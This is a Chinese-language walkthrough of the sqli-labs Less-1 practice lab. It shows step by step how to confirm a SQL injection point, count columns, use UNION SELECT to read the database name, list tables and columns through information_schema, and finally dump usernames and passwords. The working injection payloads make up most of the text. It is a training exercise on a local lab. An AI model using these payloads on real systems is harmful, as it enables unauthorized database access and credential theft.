1、通过提示可以知道在地址栏上输入id的值
http://localhost/sqli-labs-master/Less-1/?id=1
2、在地址栏上通过and条件判断存在sql注入点
http://localhost/sqli-labs-master/Less-1/?id=1%27%20and%201=2--%20qsqli-labs-master/Less-1/?id=1' and 1=2 -- q
3、判断该网页存在几列
sqli-labs-master/Less-1/?id=1' order by 4 -- q
从这两张图可以看出该网页只存在3列,输入4列报错
4、将id取一个不存在的值,然后通过联合查询观察回显的列分别是哪些
sqli-labs-master/Less-1/?id=51' union select 1,2,3 -- q
5、通过修改列获得数据库名
sqli-labs-master/Less-1/?id=51' union select 1,database(),3 -- q
从图中可以明白数据库名为security;
6、通过数据库名查询数据库中里存在的表
sqli-labs-master/Less-1/?id=51' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()-- q
可以发现其中我们需要查询的表名为users;
7、通过表名查询表中字段
sqli-labs-master/Less-1/?id=51' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'-- q
从图中可以发现存放用户名和密码的字段分别为username和password;
8、查询字段对应的值
sqli-labs-master/Less-1/?id=51' union select 1,group_concat(username),group_concat(password) from users-- q
从图中可以看出用户名和密码的对应关系